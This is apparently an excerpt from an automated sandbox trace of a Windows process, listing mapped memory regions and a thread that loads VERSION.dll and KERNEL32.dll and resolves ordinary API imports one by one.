0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1507 start_va = 0x2b80000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 1508 start_va = 0x5e0000 end_va = 0x5e9fff monitored = 0 entry_point = 0x5e15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Thread: id = 92 os_tid = 0xa30 [0176.218] ResetEvent (hEvent=0x8) returned 1 [0176.218] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.237] LoadLibraryW (lpLibFileName="VERSION.dll") returned 0x7ffb1a000000 [0176.252] ResetEvent (hEvent=0x8) returned 1 [0176.252] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.265] GetProcAddress (hModule=0x7ffb1a000000, lpProcName="GetFileVersionInfoA") returned 0x7ffb1a001090 [0176.266] ResetEvent (hEvent=0x8) returned 1 [0176.266] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.271] GetProcAddress (hModule=0x7ffb1a000000, lpProcName="VerQueryValueA") returned 0x7ffb1a001020 [0176.271] ResetEvent (hEvent=0x8) returned 1 [0176.271] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.275] GetProcAddress (hModule=0x7ffb1a000000, lpProcName="GetFileVersionInfoSizeA") returned 0x7ffb1a001010 [0176.275] ResetEvent (hEvent=0x8) returned 1 [0176.275] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.279] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x7ffb26230000 [0176.279] ResetEvent (hEvent=0x8) returned 1 [0176.279] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.284] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetLastError") returned 0x7ffb2624b710 [0176.284] ResetEvent (hEvent=0x8) returned 1 [0176.284] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.288] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapFree") returned 0x7ffb2624b480 [0176.288] ResetEvent (hEvent=0x8) returned 1 [0176.288] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.292] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapSize") returned 0x7ffb28b1b780 [0176.292] ResetEvent (hEvent=0x8) returned 1 [0176.292] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.296] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0176.296] ResetEvent (hEvent=0x8) returned 1 [0176.296] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.300] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapAlloc") returned 0x7ffb28b252d0 [0176.300] ResetEvent (hEvent=0x8) returned 1 [0176.300] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.327] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0176.327] ResetEvent (hEvent=0x8) returned 1 [0176.327] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.332] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0176.332] ResetEvent (hEvent=0x8) returned 1 [0176.332] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcpyA") returned 0x7ffb262545d0 [0176.338] ResetEvent (hEvent=0x8) returned 1 [0176.338] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.341] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0176.341] ResetEvent (hEvent=0x8) returned 1 [0176.341] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.346] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0176.346] ResetEvent (hEvent=0x8) returned 1 [0176.346] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.350] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0176.350] ResetEvent (hEvent=0x8) returned 1 [0176.350] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.354] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThread") returned 0x7ffb262516f0 [0176.354] ResetEvent (hEvent=0x8) returned 1 [0176.354] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.358] GetProcAddress (hModule=0x7ffb26230000, lpProcName="DeleteCriticalSection") returned 0x7ffb28b599d0 [0176.358] ResetEvent (hEvent=0x8) returned 1 [0176.358] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.364] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenW") returned 0x7ffb2624d6d0 [0176.364] ResetEvent (hEvent=0x8) returned 1 [0176.364] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.368] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LocalFree") returned 0x7ffb2624dd10 [0176.368] ResetEvent (hEvent=0x8) returned 1 [0176.368] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.372] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcpynA") returned 0x7ffb26276ae0 [0176.372] ResetEvent (hEvent=0x8) returned 1 [0176.372] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.377] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcmpA") returned 0x7ffb26253690 [0176.377] ResetEvent (hEvent=0x8) returned 1 [0176.377] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.381] GetProcAddress (hModule=0x7ffb26230000, lpProcName="AreFileApisANSI") returned 0x7ffb26254820 [0176.381] ResetEvent (hEvent=0x8) returned 1 [0176.381] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.386] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ReadFile") returned 0x7ffb2625dbd0 [0176.386] ResetEvent (hEvent=0x8) returned 1 [0176.386] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.391] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TryEnterCriticalSection") returned 0x7ffb28b50d20 [0176.391] ResetEvent (hEvent=0x8) returned 1 [0176.391] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.395] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapCreate") returned 0x7ffb262572b0 [0176.395] ResetEvent (hEvent=0x8) returned 1 [0176.395] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.400] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFullPathNameW") returned 0x7ffb2625db00 [0176.400] ResetEvent (hEvent=0x8) returned 1 [0176.400] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.403] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WriteFile") returned 0x7ffb2625dcc0 [0176.403] ResetEvent (hEvent=0x8) returned 1 [0176.403] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.408] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetDiskFreeSpaceW") returned 0x7ffb2625da10 [0176.408] ResetEvent (hEvent=0x8) returned 1 [0176.408] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.412] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OutputDebugStringA") returned 0x7ffb2625a300 [0176.412] ResetEvent (hEvent=0x8) returned 1 [0176.412] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.417] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LockFile") returned 0x7ffb2625dba0 [0176.417] ResetEvent (hEvent=0x8) returned 1 [0176.417] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetFilePointer") returned 0x7ffb2625dc60 [0176.422] ResetEvent (hEvent=0x8) returned 1 [0176.422] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFullPathNameA") returned 0x7ffb2625daf0 [0176.426] ResetEvent (hEvent=0x8) returned 1 [0176.426] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.430] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetEndOfFile") returned 0x7ffb2625dc20 [0176.430] ResetEvent (hEvent=0x8) returned 1 [0176.430] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.434] GetProcAddress (hModule=0x7ffb26230000, lpProcName="UnlockFileEx") returned 0x7ffb2625dcb0 [0176.434] ResetEvent (hEvent=0x8) returned 1 [0176.434] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTempPathW") returned 0x7ffb2625db50 [0176.438] ResetEvent (hEvent=0x8) returned 1 [0176.438] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateMutexW") returned 0x7ffb2625d710 [0176.443] ResetEvent (hEvent=0x8) returned 1 [0176.443] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForSingleObject") returned 0x7ffb2625d840 [0176.447] ResetEvent (hEvent=0x8) returned 1 [0176.447] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileW") returned 0x7ffb2625d8b0 [0176.452] ResetEvent (hEvent=0x8) returned 1 [0176.452] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.456] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileAttributesW") returned 0x7ffb2625da70 [0176.456] ResetEvent (hEvent=0x8) returned 1 [0176.456] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.460] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentThreadId") returned 0x7ffb2624b460 [0176.460] ResetEvent (hEvent=0x8) returned 1 [0176.460] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.465] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetLastError") returned 0x7ffb2624b730 [0176.465] ResetEvent (hEvent=0x8) returned 1 [0176.465] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapValidate") returned 0x7ffb26253730 [0176.470] ResetEvent (hEvent=0x8) returned 1 [0176.470] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.475] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0176.475] ResetEvent (hEvent=0x8) returned 1 [0176.475] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTempPathA") returned 0x7ffb2625db40 [0176.485] ResetEvent (hEvent=0x8) returned 1 [0176.485] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.494] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FormatMessageW") returned 0x7ffb262545c0 [0176.494] ResetEvent (hEvent=0x8) returned 1 [0176.494] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.498] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetDiskFreeSpaceA") returned 0x7ffb2625d9e0 [0176.498] ResetEvent (hEvent=0x8) returned 1 [0176.498] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.503] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileAttributesA") returned 0x7ffb2625da40 [0176.504] ResetEvent (hEvent=0x8) returned 1 [0176.504] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.507] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileAttributesExW") returned 0x7ffb2625da60 [0176.507] ResetEvent (hEvent=0x8) returned 1 [0176.507] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.511] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OutputDebugStringW") returned 0x7ffb26250da0 [0176.511] ResetEvent (hEvent=0x8) returned 1 [0176.511] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.516] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlushViewOfFile") returned 0x7ffb26259150 [0176.516] ResetEvent (hEvent=0x8) returned 1 [0176.516] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.521] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileA") returned 0x7ffb2625d8a0 [0176.521] ResetEvent (hEvent=0x8) returned 1 [0176.521] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.532] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForSingleObjectEx") returned 0x7ffb2625d850 [0176.532] ResetEvent (hEvent=0x8) returned 1 [0176.532] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.537] GetProcAddress (hModule=0x7ffb26230000, lpProcName="DeleteFileA") returned 0x7ffb2625d8d0 [0176.537] ResetEvent (hEvent=0x8) returned 1 [0176.537] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.541] GetProcAddress (hModule=0x7ffb26230000, lpProcName="DeleteFileW") returned 0x7ffb2625d8e0 [0176.541] ResetEvent (hEvent=0x8) returned 1 [0176.541] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0176.545] ResetEvent (hEvent=0x8) returned 1 [0176.545] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.549] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemInfo") returned 0x7ffb26256720 [0176.549] ResetEvent (hEvent=0x8) returned 1 [0176.549] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.553] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0176.553] ResetEvent (hEvent=0x8) returned 1 [0176.553] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.558] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapCompact") returned 0x7ffb26276020 [0176.558] ResetEvent (hEvent=0x8) returned 1 [0176.558] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.561] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapDestroy") returned 0x7ffb262590c0 [0176.561] ResetEvent (hEvent=0x8) returned 1 [0176.561] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.565] GetProcAddress (hModule=0x7ffb26230000, lpProcName="UnlockFile") returned 0x7ffb2625dca0 [0176.566] ResetEvent (hEvent=0x8) returned 1 [0176.566] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.569] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LockFileEx") returned 0x7ffb2625dbb0 [0176.569] ResetEvent (hEvent=0x8) returned 1 [0176.569] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.573] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileSize") returned 0x7ffb2625da90 [0176.573] ResetEvent (hEvent=0x8) returned 1 [0176.573] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.577] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcessId") returned 0x7ffb2624b4a0 [0176.577] ResetEvent (hEvent=0x8) returned 1 [0176.577] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.581] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SystemTimeToFileTime") returned 0x7ffb26257290 [0176.581] ResetEvent (hEvent=0x8) returned 1 [0176.581] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.585] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0176.585] ResetEvent (hEvent=0x8) returned 1 [0176.585] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.588] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0176.588] ResetEvent (hEvent=0x8) returned 1 [0176.588] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.593] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemTimeAsFileTime") returned 0x7ffb2624df70 [0176.593] ResetEvent (hEvent=0x8) returned 1 [0176.593] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.596] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemTime") returned 0x7ffb26250580 [0176.597] ResetEvent (hEvent=0x8) returned 1 [0176.597] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.600] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FormatMessageA") returned 0x7ffb2625a9c0 [0176.600] ResetEvent (hEvent=0x8) returned 1 [0176.600] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.625] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileMappingW") returned 0x7ffb26253af0 [0176.625] ResetEvent (hEvent=0x8) returned 1 [0176.625] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.629] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MapViewOfFile") returned 0x7ffb26254860 [0176.629] ResetEvent (hEvent=0x8) returned 1 [0176.629] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.633] GetProcAddress (hModule=0x7ffb26230000, lpProcName="QueryPerformanceCounter") returned 0x7ffb2624b720 [0176.633] ResetEvent (hEvent=0x8) returned 1 [0176.633] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.637] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0176.637] ResetEvent (hEvent=0x8) returned 1 [0176.637] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.641] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetConsoleCP") returned 0x7ffb2625df90 [0176.641] ResetEvent (hEvent=0x8) returned 1 [0176.641] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.645] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetStdHandle") returned 0x7ffb26257190 [0176.645] ResetEvent (hEvent=0x8) returned 1 [0176.645] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.650] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStringTypeW") returned 0x7ffb26254bf0 [0176.650] ResetEvent (hEvent=0x8) returned 1 [0176.650] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.654] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileType") returned 0x7ffb2625dac0 [0176.654] ResetEvent (hEvent=0x8) returned 1 [0176.654] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.658] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStdHandle") returned 0x7ffb26253e80 [0176.658] ResetEvent (hEvent=0x8) returned 1 [0176.658] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.662] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.662] ResetEvent (hEvent=0x8) returned 1 [0176.662] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.666] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0176.666] ResetEvent (hEvent=0x8) returned 1 [0176.666] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.670] GetProcAddress (hModule=0x7ffb26230000, lpProcName="AddVectoredExceptionHandler") returned 0x7ffb28b72650 [0176.670] ResetEvent (hEvent=0x8) returned 1 [0176.670] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.673] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0176.673] ResetEvent (hEvent=0x8) returned 1 [0176.673] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.677] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetConsoleMode") returned 0x7ffb2625dfa0 [0176.677] ResetEvent (hEvent=0x8) returned 1 [0176.677] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.680] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleA") returned 0x7ffb26254c90 [0176.680] ResetEvent (hEvent=0x8) returned 1 [0176.680] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.683] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetFilePointerEx") returned 0x7ffb2625dc70 [0176.683] ResetEvent (hEvent=0x8) returned 1 [0176.683] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.686] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WriteConsoleW") returned 0x7ffb2625e050 [0176.686] ResetEvent (hEvent=0x8) returned 1 [0176.686] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.689] GetProcAddress (hModule=0x7ffb26230000, lpProcName="UnmapViewOfFile") returned 0x7ffb26254ce0 [0176.689] ResetEvent (hEvent=0x8) returned 1 [0176.689] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.693] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlushFileBuffers") returned 0x7ffb2625d9d0 [0176.693] ResetEvent (hEvent=0x8) returned 1 [0176.693] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.696] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlCaptureContext") returned 0x7ffb2625d410 [0176.696] ResetEvent (hEvent=0x8) returned 1 [0176.696] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.699] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlLookupFunctionEntry") returned 0x7ffb26256e60 [0176.699] ResetEvent (hEvent=0x8) returned 1 [0176.699] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 